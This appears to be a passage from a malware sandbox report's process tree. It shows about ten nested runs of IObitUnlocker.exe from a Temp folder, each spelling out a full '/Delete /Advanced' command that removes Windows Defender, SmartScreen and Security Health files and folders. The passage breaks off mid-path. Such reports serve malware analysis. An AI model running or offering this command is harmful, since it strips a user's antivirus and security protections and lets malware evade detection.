                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6564
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7424
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 